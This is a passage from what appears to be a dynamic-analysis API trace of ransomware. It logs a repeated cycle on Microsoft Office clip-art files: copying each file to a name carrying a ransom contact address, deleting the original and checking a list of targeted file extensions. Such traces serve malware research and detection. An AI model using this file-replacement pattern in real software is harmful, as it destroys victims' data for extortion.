Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.599] GetLastError () returned 0x0 [0070.599] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3264, lpOverlapped=0x0) returned 1 [0070.703] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3270, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3270, lpOverlapped=0x0) returned 1 [0070.704] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.704] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.704] SetEndOfFile (hFile=0x36c) returned 1 [0070.704] CloseHandle (hObject=0x36c) returned 1 [0070.705] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.705] SetEndOfFile (hFile=0x340) returned 1 [0070.705] CloseHandle (hObject=0x340) returned 1 [0070.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.706] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf")) returned 1 [0070.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 68 [0070.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 68 [0070.706] lstrlenW (lpString=".doc") returned 4 [0070.706] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.706] lstrlenW (lpString=".docx") returned 5 [0070.706] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0070.706] lstrlenW (lpString=".pdf") returned 4 [0070.706] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.706] lstrlenW (lpString=".xls") returned 4 [0070.706] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.706] lstrlenW (lpString=".xlsx") returned 5 [0070.706] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0070.706] lstrlenW (lpString=".ppt") returned 4 [0070.707] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 68 [0070.707] lstrlenW (lpString=".zip") returned 4 [0070.707] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.707] lstrlenW (lpString=".rar") returned 4 [0070.707] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.707] lstrlenW (lpString=".bz2") returned 4 [0070.707] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.707] lstrlenW (lpString=".7z") returned 3 [0070.707] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 68 [0070.707] lstrlenW (lpString=".dbf") returned 4 [0070.707] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 68 [0070.707] lstrlenW (lpString=".1cd") returned 4 [0070.707] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 68 [0070.707] lstrlenW (lpString=".jpg") returned 4 [0070.707] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.707] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.707] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.708] GetLastError () returned 0x0 [0070.708] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1714, lpOverlapped=0x0) returned 1 [0070.716] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1720, lpOverlapped=0x0) returned 1 [0070.717] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.717] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.717] SetEndOfFile (hFile=0x36c) returned 1 [0070.717] CloseHandle (hObject=0x36c) returned 1 [0070.717] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.717] SetEndOfFile (hFile=0x340) returned 1 [0070.718] CloseHandle (hObject=0x340) returned 1 [0070.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf")) returned 1 [0070.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 68 [0070.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 68 [0070.719] lstrlenW (lpString=".doc") returned 4 [0070.719] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.719] lstrlenW (lpString=".docx") returned 5 [0070.719] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0070.720] lstrlenW (lpString=".pdf") returned 4 [0070.720] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.720] lstrlenW (lpString=".xls") returned 4 [0070.720] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.720] lstrlenW (lpString=".xlsx") returned 5 [0070.720] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0070.720] lstrlenW (lpString=".ppt") returned 4 [0070.720] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 68 [0070.720] lstrlenW (lpString=".zip") returned 4 [0070.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.720] lstrlenW (lpString=".rar") returned 4 [0070.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.720] lstrlenW (lpString=".bz2") returned 4 [0070.720] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.720] lstrlenW (lpString=".7z") returned 3 [0070.720] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 68 [0070.720] lstrlenW (lpString=".dbf") returned 4 [0070.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 68 [0070.720] lstrlenW (lpString=".1cd") returned 4 [0070.720] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 68 [0070.720] lstrlenW (lpString=".jpg") returned 4 [0070.720] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.724] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.724] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.724] GetLastError () returned 0x0 [0070.724] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1434, lpOverlapped=0x0) returned 1 [0070.748] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1440, lpOverlapped=0x0) returned 1 [0070.748] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.749] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.749] SetEndOfFile (hFile=0x38c) returned 1 [0070.749] CloseHandle (hObject=0x38c) returned 1 [0070.749] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.749] SetEndOfFile (hFile=0x384) returned 1 [0070.752] CloseHandle (hObject=0x384) returned 1 [0070.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf")) returned 1 [0070.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 68 [0070.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 68 [0070.753] lstrlenW (lpString=".doc") returned 4 [0070.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.753] lstrlenW (lpString=".docx") returned 5 [0070.753] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0070.753] lstrlenW (lpString=".pdf") returned 4 [0070.753] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.753] lstrlenW (lpString=".xls") returned 4 [0070.753] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.753] lstrlenW (lpString=".xlsx") returned 5 [0070.753] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0070.753] lstrlenW (lpString=".ppt") returned 4 [0070.753] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 68 [0070.753] lstrlenW (lpString=".zip") returned 4 [0070.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.753] lstrlenW (lpString=".rar") returned 4 [0070.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.753] lstrlenW (lpString=".bz2") returned 4 [0070.753] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.753] lstrlenW (lpString=".7z") returned 3 [0070.753] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 68 [0070.753] lstrlenW (lpString=".dbf") returned 4 [0070.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 68 [0070.753] lstrlenW (lpString=".1cd") returned 4 [0070.754] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 68 [0070.754] lstrlenW (lpString=".jpg") returned 4 [0070.754] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.754] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.754] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.754] GetLastError () returned 0x0 [0070.754] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1600, lpOverlapped=0x0) returned 1 [0070.764] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1610, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1610, lpOverlapped=0x0) returned 1 [0070.765] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.765] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.765] SetEndOfFile (hFile=0x38c) returned 1 [0070.765] CloseHandle (hObject=0x38c) returned 1 [0070.765] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.765] SetEndOfFile (hFile=0x384) returned 1 [0070.766] CloseHandle (hObject=0x384) returned 1 [0070.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.767] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf")) returned 1 [0070.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 68 [0070.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 68 [0070.767] lstrlenW (lpString=".doc") returned 4 [0070.767] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.767] lstrlenW (lpString=".docx") returned 5 [0070.767] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0070.767] lstrlenW (lpString=".pdf") returned 4 [0070.767] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.767] lstrlenW (lpString=".xls") returned 4 [0070.767] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.767] lstrlenW (lpString=".xlsx") returned 5 [0070.768] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0070.768] lstrlenW (lpString=".ppt") returned 4 [0070.768] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 68 [0070.768] lstrlenW (lpString=".zip") returned 4 [0070.768] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.768] lstrlenW (lpString=".rar") returned 4 [0070.768] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.768] lstrlenW (lpString=".bz2") returned 4 [0070.768] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.768] lstrlenW (lpString=".7z") returned 3 [0070.768] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 68 [0070.768] lstrlenW (lpString=".dbf") returned 4 [0070.768] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 68 [0070.768] lstrlenW (lpString=".1cd") returned 4 [0070.768] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 68 [0070.768] lstrlenW (lpString=".jpg") returned 4 [0070.768] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.770] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.770] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.771] GetLastError () returned 0x0 [0070.771] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xd74, lpOverlapped=0x0) returned 1 [0070.845] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xd80, lpOverlapped=0x0) returned 1 [0071.167] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0071.167] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0071.167] SetEndOfFile (hFile=0x38c) returned 1 [0071.167] CloseHandle (hObject=0x38c) returned 1 [0071.167] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.167] SetEndOfFile (hFile=0x384) returned 1 [0071.168] CloseHandle (hObject=0x384) returned 1 [0071.168] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf")) returned 1 [0071.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 68 [0071.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 68 [0071.169] lstrlenW (lpString=".doc") returned 4 [0071.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.170] lstrlenW (lpString=".docx") returned 5 [0071.170] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0071.170] lstrlenW (lpString=".pdf") returned 4 [0071.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.170] lstrlenW (lpString=".xls") returned 4 [0071.170] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.170] lstrlenW (lpString=".xlsx") returned 5 [0071.170] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0071.170] lstrlenW (lpString=".ppt") returned 4 [0071.170] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 68 [0071.177] lstrlenW (lpString=".zip") returned 4 [0071.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.177] lstrlenW (lpString=".rar") returned 4 [0071.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.177] lstrlenW (lpString=".bz2") returned 4 [0071.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.178] lstrlenW (lpString=".7z") returned 3 [0071.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 68 [0071.178] lstrlenW (lpString=".dbf") returned 4 [0071.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 68 [0071.178] lstrlenW (lpString=".1cd") returned 4 [0071.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 68 [0071.178] lstrlenW (lpString=".jpg") returned 4 [0071.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.178] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.178] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0071.179] GetLastError () returned 0x0 [0071.179] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4b80, lpOverlapped=0x0) returned 1 [0071.191] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4b90, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4b90, lpOverlapped=0x0) returned 1 [0071.192] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0071.192] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0071.192] SetEndOfFile (hFile=0x38c) returned 1 [0071.192] CloseHandle (hObject=0x38c) returned 1 [0071.192] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.193] SetEndOfFile (hFile=0x384) returned 1 [0071.194] CloseHandle (hObject=0x384) returned 1 [0071.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 